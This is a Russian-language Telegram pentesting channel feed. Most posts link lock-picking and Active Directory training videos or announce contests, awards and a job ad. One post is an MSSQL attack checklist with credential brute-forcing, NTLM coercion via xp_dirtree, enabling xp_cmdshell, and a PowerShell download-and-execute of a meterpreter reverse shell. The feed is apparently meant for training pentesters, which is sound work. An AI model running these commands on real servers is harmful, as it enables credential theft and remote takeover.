Всем привет!🚀
С точки зрения любителя разобрал вскрытие одного из проектных замков с одним точеным пином. Записал какой делал подход, не судите строго, особенно медвежатники со стажем, напоминаю, что опыта - без году неделя👌
ФИЗИЧЕСКИЙ ПЕНТЕСТ // ВЗЛОМ ЗАМКА DORMA
https://youtu.be/kKhZc3Rf6zY
С точки зрения любителя разобрал вскрытие одного из проектных замков с одним точеным пином. Записал какой делал подход, не судите строго, особенно медвежатники со стажем, напоминаю, что опыта - без году неделя
ФИЗИЧЕСКИЙ ПЕНТЕСТ // ВЗЛОМ ЗАМКА DORMA
https://youtu.be/kKhZc3Rf6zY
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Техника аварийного вскрытия замков
В этом видео вы увидите, как я проводил аварийное вскрытие замка с использованием слесарного инструмента. Независимо от вашего уровня опыта, это видео поможет вам расширить свои знания и навыки в области физической безопасности.
Дисклеймер
Это обучающее…
Дисклеймер
Это обучающее…
1🔥12👍2✍1
Зачем нам физика? Да кто к нам залезет, у нас дядьки с автоматами, вот один из кейсов, когда поймали, а сколько кейсов, которые нельзя публиковать или просто ещё не обнаружили 😂😂😂
🔥6✍3🤝1
Forwarded from ВЧК-ОГПУ
ВЧК-ОГПУ стало известно, как хакеры взломали систему отечественного заменителя Макдональдса — ресторана Вкусно и точка. Напомним, в прошлом году вокруг ситуации с утечкой данных 300 тысяч соискателей работы в фастфуд-компании разгорелся нешуточный скандал. ООО Система ПБО (Вкусно и точка) заявляли о хакерских атаках и прочем, но на самом деле следы приведи к «микрокомпьютеру». Так, по версии следствия, не позднее 7 декабря 2022 года, неустановленные лица, осуществили неправомерный доступ к серверам ООО, путем вмешательства в функционирование систем хранения и обработки компьютерной информации. А именно путем установки микрокомпьютера марки «Raspberry Pi» модели «4 Model B 8 Gb» с установленной в него SD-картой, модема модели «IK41VE1» и сетевого коммутатора марки «HIKVISION» марки «DS-3E0105D-E» в терминал самообслуживания ПБО «Вкусно – и точка» в целях модификации (предварительно, хищения) компьютерной информации, хранящейся на серверах. По данному факту на днях было возбуждено уголовное дело по статье 272 УК РФ «Неправомерный доступ к компьютерной информации».
🔥14✍3🤝1
Всем привет! Продолжаю снимать для вас контент по вскрытию замков, приятного просмотра!
https://youtu.be/rqoaCQxOwQU
https://youtu.be/rqoaCQxOwQU
YouTube
Три способа аварийного вскрытия перфорированного замка
В этом видео, я покажу 3 способа открытия перфо-замка PALIDORE:
- отмычкой-скороходом
- перфо-отмычкой
- методом самоимпрессии
Дисклеймер
Это обучающее видео создано исключительно в образовательных целях.
Ответственность:
Автор видео не несет ответственности…
- отмычкой-скороходом
- перфо-отмычкой
- методом самоимпрессии
Дисклеймер
Это обучающее видео создано исключительно в образовательных целях.
Ответственность:
Автор видео не несет ответственности…
1🔥24👍6✍2
Всем привет! На этот раз кидаю гайд по вскрытию APECS XR с 4 классом защиты🔥
https://youtu.be/o-o-1PPHjVc?feature=shared
https://youtu.be/o-o-1PPHjVc?feature=shared
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Открыл шпилькой сложный замок
В этом видео вы увидите как я открываю перфорированный замок APECS серии XR с помощью слесарного инструмента, а также используя заколку-невидимку. Когда мы с командой увидели технический паспорт с описанием его защиты, то отложили затею с вскрытием в дальний…
1🔥18✍3👍2
Всем привет! Кто хочет поучавствовать в интересном конкурсе велком:
- сдавайте репорты
- их оценит жюри
- вы сможете побороться за хорошие призы!
P.S. Буду тоже в членах жюри смотреть ваши репорты🙂
https://t.iss.one/yrrp_official
- сдавайте репорты
- их оценит жюри
- вы сможете побороться за хорошие призы!
P.S. Буду тоже в членах жюри смотреть ваши репорты
https://t.iss.one/yrrp_official
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Young Researchers Reward Program
Официальный телеграм канал YRRP.
Краудсорс благотворительная программа для молодых ИБ исследователей. Оплата билетов и дороги на крупнейшие отечественные ИБ конференции и мероприятия.
Обратная связь: @SidneyJob, @Curiv
Краудсорс благотворительная программа для молодых ИБ исследователей. Оплата билетов и дороги на крупнейшие отечественные ИБ конференции и мероприятия.
Обратная связь: @SidneyJob, @Curiv
🔥9✍2🤝2
В этом плейлисте буду публиковать различные заметки на предмет пентеста Active Directory🔥
Чтобы начинающие специалисты могли бесплатно обучаться.
Приятного просмотра!
https://youtube.com/playlist?list=PL_9PYTM_M4KvgCAIdzripKjUZLF0kitaX&si=1e4ckgcjZPrOOyWM
Чтобы начинающие специалисты могли бесплатно обучаться.
Приятного просмотра!
https://youtube.com/playlist?list=PL_9PYTM_M4KvgCAIdzripKjUZLF0kitaX&si=1e4ckgcjZPrOOyWM
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥66👍26🤝1
Всем привет!
До окончания конкурса остается несколько дней. Организаторский состав принял решение расширить критерии оценки. ❗️
Теперь вы можете отправлять в бота не только описание интересных багов с багбаунти, но и интересные реализованные векторы на CTF и собственные ресерчи во всех направлениях ИБ 🔥
К нам уже поступило несколько заявок, но мы очень хотим, чтобы и другие молодые таланты получили билеты на PHDays и компенсацию стоимости дороги в обе стороны. ❤️
Если у вас уже есть билет, то мы аналогичным образом компенсируем дорогу.
Поэтому не откладывайте и присылайте свои материалы в бота: @yrrp_bot
До окончания конкурса остается несколько дней. Организаторский состав принял решение расширить критерии оценки. ❗️
Теперь вы можете отправлять в бота не только описание интересных багов с багбаунти, но и интересные реализованные векторы на CTF и собственные ресерчи во всех направлениях ИБ 🔥
К нам уже поступило несколько заявок, но мы очень хотим, чтобы и другие молодые таланты получили билеты на PHDays и компенсацию стоимости дороги в обе стороны. ❤️
Если у вас уже есть билет, то мы аналогичным образом компенсируем дорогу.
Поэтому не откладывайте и присылайте свои материалы в бота: @yrrp_bot
Telegram
PRO:PENTEST
Всем привет! Кто хочет поучавствовать в интересном конкурсе велком:
- сдавайте репорты
- их оценит жюри
- вы сможете побороться за хорошие призы!
P.S. Буду тоже в членах жюри смотреть ваши репорты🙂
https://t.iss.one/yrrp_official
- сдавайте репорты
- их оценит жюри
- вы сможете побороться за хорошие призы!
P.S. Буду тоже в членах жюри смотреть ваши репорты🙂
https://t.iss.one/yrrp_official
🔥4✍3🤝1
Ежегодная независимая премия для пентестеров — Pentest award возвращается!
Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.
В этот раз вас ждут 6 номинаций, по три призовых места в каждой:
— Пробив WEB🆕
— Пробив инфраструктуры🆕
— Девайс🆕
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка
Главный приз — тяжеленная стеклянная именная статуэтка за первое место. Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.
Сбор заявок уже открыт на сайте — https://award.awillix.ru/
Давайте покажем, на что способны этичные хакеры!
#pentestaward
Раз в году у этичных хакеров появляется шанс громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями из практики на церемонии награждения Pentest award.
В этот раз вас ждут 6 номинаций, по три призовых места в каждой:
— Пробив WEB
— Пробив инфраструктуры
— Девайс
— Hack the logic
— Раз bypass, два bypass
— Ловись рыбка
Главный приз — тяжеленная стеклянная именная статуэтка за первое место. Не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также бесценные подарки от партнеров проекта BI.ZONE Bug Bounty и VK Bug Bounty.
Сбор заявок уже открыт на сайте — https://award.awillix.ru/
Давайте покажем, на что способны этичные хакеры!
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍3🤝2
Новичкам внутрянщикам думаю понравится🔥
Приятного просмотра!
https://youtu.be/KBM5ovH4OeI?si=M02VPac53DYEfUlF
Приятного просмотра!
https://youtu.be/KBM5ovH4OeI?si=M02VPac53DYEfUlF
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥10👍4🤝1
Всем привет!
Решил сделать плейлист на не технические темы. Там будут раскрыты самые популярные вопросы от заказчиков и мое субъективное мнение на различные вещи.
В данном видео разберу популярный вопрос от заказчиков, а что такое white/gray/black box?
Это информация поможет найти взаимопонимание между исполнителем (технарем) и представителем заказчика (менеджером).
Приятного просмотра!
https://youtu.be/k-LImjkQ35g
Решил сделать плейлист на не технические темы. Там будут раскрыты самые популярные вопросы от заказчиков и мое субъективное мнение на различные вещи.
В данном видео разберу популярный вопрос от заказчиков, а что такое white/gray/black box?
Это информация поможет найти взаимопонимание между исполнителем (технарем) и представителем заказчика (менеджером).
Приятного просмотра!
https://youtu.be/k-LImjkQ35g
🔥41👍30🤝1
Подборка роликов про MS17-010
Если хочешь выработать концепцию, благодаря которой запуск эксплоита будет представлять из себя нечто большее, чем просто выполнение нескольких команд в надежде что все получится, то обязательно посмотри эти видео. Уязвимость старая, сейчас встречается больше на различных промышленных предприятиях, но сам подход к исследованию является на мой взгляд оптимальным.
Приятного просмотра!
🧨 https://www.youtube.com/watch?v=vJBZk2JG3vQ&t=70s
🧨 https://www.youtube.com/watch?v=7bJqcKCsG4c&t=133s
🧨 https://www.youtube.com/watch?v=3XqhIIPoJWE&t=9s
🧨 https://www.youtube.com/watch?v=bSUnYN7tChI
Если хочешь выработать концепцию, благодаря которой запуск эксплоита будет представлять из себя нечто большее, чем просто выполнение нескольких команд в надежде что все получится, то обязательно посмотри эти видео. Уязвимость старая, сейчас встречается больше на различных промышленных предприятиях, но сам подход к исследованию является на мой взгляд оптимальным.
Приятного просмотра!
🧨 https://www.youtube.com/watch?v=vJBZk2JG3vQ&t=70s
🧨 https://www.youtube.com/watch?v=7bJqcKCsG4c&t=133s
🧨 https://www.youtube.com/watch?v=3XqhIIPoJWE&t=9s
🧨 https://www.youtube.com/watch?v=bSUnYN7tChI
🔥70👍56🤝1
Всем привет! Как вам Standoff 13? Свой вариант а комментарии 😉
Anonymous Poll
26%
Супер, мне очень понравилось! 🔥
20%
Было сложно и интересно ❤️
24%
Такое себе, больше не пойду 🤮
49%
Полная ЯМА 😡
✍6🤮2👍1
Forwarded from BooL
Друзья, сообщество Standoff.
Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.
Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.
На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.
1. Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.
2. Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.
3. Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.
Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.
В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.
True0xA3 (ТруОАЗ)
Благодарим всех, кто играл сегодня с нами. Конечно же мы благодарим наших союзников, отличных ребят, экспертов своего дела, а также благодарим наших соперников, с которыми создали по-настоящему накаленную атмосферу.
Обращаемся к вам, чтобы обрамить наши последующие действия в понятный и доходчивый посыл: Мы не хотим дискредитировать вашу хорошую игру, но не согласны с тем, что организаторы обеспечили честную игру для каждой команды.
На этом мероприятии мы и вы наблюдали, следующие факты, не позволяющие признавать происходящее настоящим сравнением сил сторон.
1. Те риски, что не смогла реализовать Государство S были неподготовлены к игре и нерешабельны, другая часть рисков так и не была доступна для решения в ходе игры из-за ошибок в системах скада и работе сети.
2. Нашим соперникам досталось 3 сегмента сети для атак, которые весь год находились на полигоне 365, а заверения организаторов о том, что они обновили инфраструктуру и задачи не оказались правдой.
3. Организаторы знали, что команда Pr1me, которая с самого начала отказалась играть, и даже на этапе подготовки сообщила об этом, была включена в общий зачет. А в последствии принесла победное значение коэффициента команде государства F своим "внезапным" отсутствием.
Как утверждалось в презентации мероприятия: "Победит самое сплоченное государство". Определенно государство S вышло победителем в этой схватке, как самое сплоченное, сыгранное и объединившееся. Мы благодарим за игру наших соратников, мы также благодарим за игру наших соперников.
В сложившейся ситуации мы вынуждены принять решение об отказе от участия в дальнейших активностях мероприятия Standoff 13.
True0xA3 (ТруОАЗ)
🔥32🤝14😢5✍3🤮2👍1
Вакансия: Технический писатель для департамента пентестеров
О компании:
Наша компания является ведущим игроком в сфере кибербезопасности. Одним из приоритетных направлений нашей компании является проведение комплексных тестов на проникновение (пентестов) для наших клиентов в России и за рубежом. Мы помогаем компаниям защищать свои цифровые ресурсы, выявляя и устраняя уязвимости в их системах. Сейчас мы ищем опытного технического писателя для поддержки нашего департамента пентестеров.
Обязанности:
- Подготовка и редактирование отчетов по результатам пентестов.
- Создание и поддержка в актуальном состоянии документации по методологиям и процедурам пентестов.
- Разработка справочных и методических материалов, руководств и инструкций для внутренних и внешних пользователей.
- Сотрудничество с командой пентестеров для сбора технической информации и преобразования её в понятные и доступные документы.
- Обеспечение точности и полноты технической документации.
- Участие в разработке шаблонов документации.
- Обеспечение соответствия документации стандартам и лучшим практикам в ИБ.
Требования:
- Высшее образование в области информационных технологий, кибербезопасности, технического письма или аналогичных дисциплин.
- Опыт работы техническим писателем, предпочтительно в области кибербезопасности или ИТ.
- Отличные навыки письменной и устной коммуникации.
- Способность понимать и объяснять сложные технические концепции простым и понятным языком.
- Базовые знания современных стандартов и методологий этичного хакинга, анализа защищённости, оценки рисков уязвимостей.
- Готовность «погружаться» до уровня пентестера и общаться «на одном языке» касаемо разрабатываемых документов.
- Внимание к деталям и анализ разнообразных данных и информации для разрабатываемых документов, выделяя, как ключевые аспекты и результаты, так и малозначимую, спорную или недостоверную информацию.
- Способность структурировать информацию и выбирать оптимальный способ её представления и/или визуализации.
- Опыт работы с инструментами для создания и редактирования документации (например, Microsoft Office, Adobe Acrobat, Confluence, Markdown и т.д.).
- Базовые знания в области пентестов и кибербезопасности будут преимуществом.
Условия работы:
- Конкурентоспособная заработная плата.
- Официальное трудоустройство и социальные гарантии.
- Возможности для профессионального развития и обучения.
- Работа в дружной и профессиональной команде.
- Современный офис в центре города или возможность гибридной работы.
Как подать заявку:
Если вы заинтересованы в данной позиции и соответствуете требованиям, пожалуйста, отправьте ваше резюме и сопроводительное письмо на [email protected]. В сопроводительном письме расскажите о вашем опыте и объясните, почему вы хотите работать с нами.
Контактная информация:
Группа компаний «Информзащита»
Москва, Театральная аллея, 3с1
HR TG: @e_vishnevska_ya
[email protected]
+7 (495) 980-23-45
https://www.infosec.ru/
Мы с нетерпением ждем вашего отклика и возможности обсудить, как вы можете усилить нашу команду!
О компании:
Наша компания является ведущим игроком в сфере кибербезопасности. Одним из приоритетных направлений нашей компании является проведение комплексных тестов на проникновение (пентестов) для наших клиентов в России и за рубежом. Мы помогаем компаниям защищать свои цифровые ресурсы, выявляя и устраняя уязвимости в их системах. Сейчас мы ищем опытного технического писателя для поддержки нашего департамента пентестеров.
Обязанности:
- Подготовка и редактирование отчетов по результатам пентестов.
- Создание и поддержка в актуальном состоянии документации по методологиям и процедурам пентестов.
- Разработка справочных и методических материалов, руководств и инструкций для внутренних и внешних пользователей.
- Сотрудничество с командой пентестеров для сбора технической информации и преобразования её в понятные и доступные документы.
- Обеспечение точности и полноты технической документации.
- Участие в разработке шаблонов документации.
- Обеспечение соответствия документации стандартам и лучшим практикам в ИБ.
Требования:
- Высшее образование в области информационных технологий, кибербезопасности, технического письма или аналогичных дисциплин.
- Опыт работы техническим писателем, предпочтительно в области кибербезопасности или ИТ.
- Отличные навыки письменной и устной коммуникации.
- Способность понимать и объяснять сложные технические концепции простым и понятным языком.
- Базовые знания современных стандартов и методологий этичного хакинга, анализа защищённости, оценки рисков уязвимостей.
- Готовность «погружаться» до уровня пентестера и общаться «на одном языке» касаемо разрабатываемых документов.
- Внимание к деталям и анализ разнообразных данных и информации для разрабатываемых документов, выделяя, как ключевые аспекты и результаты, так и малозначимую, спорную или недостоверную информацию.
- Способность структурировать информацию и выбирать оптимальный способ её представления и/или визуализации.
- Опыт работы с инструментами для создания и редактирования документации (например, Microsoft Office, Adobe Acrobat, Confluence, Markdown и т.д.).
- Базовые знания в области пентестов и кибербезопасности будут преимуществом.
Условия работы:
- Конкурентоспособная заработная плата.
- Официальное трудоустройство и социальные гарантии.
- Возможности для профессионального развития и обучения.
- Работа в дружной и профессиональной команде.
- Современный офис в центре города или возможность гибридной работы.
Как подать заявку:
Если вы заинтересованы в данной позиции и соответствуете требованиям, пожалуйста, отправьте ваше резюме и сопроводительное письмо на [email protected]. В сопроводительном письме расскажите о вашем опыте и объясните, почему вы хотите работать с нами.
Контактная информация:
Группа компаний «Информзащита»
Москва, Театральная аллея, 3с1
HR TG: @e_vishnevska_ya
[email protected]
+7 (495) 980-23-45
https://www.infosec.ru/
Мы с нетерпением ждем вашего отклика и возможности обсудить, как вы можете усилить нашу команду!
www.infosec.ru
Информзащита
Информационная безопасность - это сфера деятельности компании Информзащита. Компания имеет сертификаты ФСТЭК. Защита персональных данных, криптография, защита информации, управление доступом – составные части системы информационной безопасности.
🔥12✍2👍1
Всем привет 👋
Гайд "Как склонировать пульт привода DoorHan?" для начинающих.
Приятного просмотра!🔥
https://youtu.be/JggaRzA_j8w
Гайд "Как склонировать пульт привода DoorHan?" для начинающих.
Приятного просмотра!
https://youtu.be/JggaRzA_j8w
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥6👍1🥴1🤝1
К сожалению за данное видео YouTube влепил мне страйк, если команда этого хостинга не пересмотрит решения, буду лепить вставки о том что это для образовательных целей.
Может я что-то упускаю и действительно выдают желтую карточку по делу? Если есть знающие люди, поделитесь пожалуйста опытом🔥
Может я что-то упускаю и действительно выдают желтую карточку по делу? Если есть знающие люди, поделитесь пожалуйста опытом
Please open Telegram to view this post
VIEW IN TELEGRAM
😢13🤯2😭2👍1
Media is too big
VIEW IN TELEGRAM
В этом уроке мы рассмотрим пентест Microsoft SQL Server.
Чек-лист к данному занятию:
#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing
Чек-лист к данному занятию:
nmap --script ms-sql-info,ms-sql-ntlm-info -sT -sV -p 445,1433 192.168.1.3
crackmapexec mssql <IP> -d <Имя домена> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
msf> use auxiliary/scanner/mssql/mssql_login
mssqlclient.py -windows-auth [email protected]
sql> select IS_SRVROLEMEMBER ('sysadmin');
sql> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
msf> use auxiliary/admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_sql_logins
responder -I eth0 -v
sql> use master; exec xp_dirtree '\\<KALI_IP>\share';--
john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash
sql> SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'xp_cmdshell';
sql> EXEC sp_configure 'show advanced options',1;
sql> RECONFIGURE;
sql> EXEC sp_configure 'xp_cmdshell',1;
sql> RECONFIGURE;
sql> xp_cmdshell "echo (Get-Service windefend).Status | powershell"
sql> xp_cmdshell "echo Get-MpComputerStatus | powershell -noprofile"
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 VERBOSE=true -f psh -o meterpreter.ps1
sql> EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(''[https://192.168.1.5:80/meterpreter.ps1](https://192.168.1.5/meterpreter.ps1)'')"'
msf> use exploit/windows/mssql/mssql_payload
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as
msf> use admin/mssql/mssql_escalate_dbowner
msf> use windows/manage/mssql_local_auth_bypass
#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing
1🔥19👍8🤮1🤝1
Всем привет👋
Давно не писал про проекты, наконец-то руки дотянулись😄
Итак, энергетическая компания, физика + внутряк.
Приятного прочтения🔥
https://teletype.in/@r00t_owl/T3LxWSSywXO
Давно не писал про проекты, наконец-то руки дотянулись😄
Итак, энергетическая компания, физика + внутряк.
Приятного прочтения
https://teletype.in/@r00t_owl/T3LxWSSywXO
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
Взлом в отрасли Энергетики
Всем привет! Давно не было статеек, все руки тянутся перевести контент в видео формат, который и послушать можно и посмотреть на фоне...
1🔥24👍7✍2🤮1